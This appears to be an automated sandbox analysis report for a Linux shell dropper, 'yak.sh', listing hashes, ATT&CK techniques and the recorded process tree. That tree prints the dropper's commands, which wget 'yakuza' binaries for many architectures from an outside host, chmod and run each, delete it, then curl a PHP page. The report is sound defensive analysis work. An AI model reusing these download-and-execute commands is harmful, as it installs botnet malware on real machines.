Analysis
-
max time kernel
149s -
max time network
7s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24-11-2024 00:00
Static task
static1
Behavioral task
behavioral1
Sample
yak.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
yak.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
yak.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
yak.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
yak.sh
-
Size
2KB
-
MD5
f50f60f970a5203dad27c480da7b4519
-
SHA1
f50f26900efe72f11c37767b5db9a3916a7c76b4
-
SHA256
ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
-
SHA512
40c118ed8e7b22ba4c439cc3de9a9d69d7cccd9b4d109b00a716ea564379e001304edaffb0f9ca143e87cb0138f566aebea2e998b76c9bb4b653cf7a191e4ddd
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 656 chmod 667 chmod 694 chmod 706 chmod 710 chmod 720 chmod 726 chmod 676 chmod 682 chmod 689 chmod 698 chmod 702 chmod 714 chmod -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc Process File opened for reading /proc/cpuinfo curl -
Processes:
curldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
rmwgetyakuza.mipselrmwgetyakuza.mipspid Process 659 rm 662 wget 669 yakuza.mipsel 671 rm 647 wget 658 yakuza.mips
Processes
-
/tmp/yak.sh/tmp/yak.sh1⤵PID:645
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mips2⤵
- System Network Configuration Discovery
PID:647
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
PID:656
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- System Network Configuration Discovery
PID:658
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
PID:659
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:662
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
PID:667
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:669
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:671
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.sh2⤵PID:673
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
PID:676
-
-
/tmp/yakuza.sh./yakuza.sh2⤵PID:677
-
-
/bin/rmrm -rf yakuza.sh2⤵PID:678
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.x862⤵PID:680
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/yakuza.x86./yakuza.x862⤵PID:684
-
-
/bin/rmrm -rf yakuza.x862⤵PID:685
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm62⤵PID:687
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵PID:690
-
-
/bin/rmrm -rf yakuza.arm62⤵PID:691
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i6862⤵PID:692
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/yakuza.i686./yakuza.i6862⤵PID:695
-
-
/bin/rmrm -rf yakuza.i6862⤵PID:696
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.ppc2⤵PID:697
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵PID:699
-
-
/bin/rmrm -rf yakuza.ppc2⤵PID:700
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i5862⤵PID:701
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
PID:702
-
-
/tmp/yakuza.i586./yakuza.i5862⤵PID:703
-
-
/bin/rmrm -rf yakuza.i5862⤵PID:704
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.m68k2⤵PID:705
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵PID:707
-
-
/bin/rmrm -rf yakuza.m68k2⤵PID:708
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm42⤵PID:709
-
-
/bin/chmodchmod +x yakuza.arm42⤵
- File and Directory Permissions Modification
PID:710
-
-
/tmp/yakuza.arm4./yakuza.arm42⤵PID:711
-
-
/bin/rmrm -rf yakuza.arm42⤵PID:712
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm52⤵PID:713
-
-
/bin/chmodchmod +x yakuza.arm52⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/yakuza.arm5./yakuza.arm52⤵PID:715
-
-
/bin/rmrm -rf yakuza.arm52⤵PID:716
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm72⤵PID:717
-
-
/bin/chmodchmod +x yakuza.arm72⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/yakuza.arm7./yakuza.arm72⤵PID:721
-
-
/bin/rmrm -rf yakuza.arm72⤵PID:722
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.sparc2⤵PID:724
-
-
/bin/chmodchmod +x yakuza.sparc2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/yakuza.sparc./yakuza.sparc2⤵PID:728
-
-
/bin/rmrm -rf yakuza.sparc2⤵PID:729
-
-
/usr/bin/curlcurl -s http://linux-it.abuser.eu/test.php2⤵
- Checks CPU configuration
- Reads runtime system information
PID:731
-
-
/bin/bashbash2⤵PID:732
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1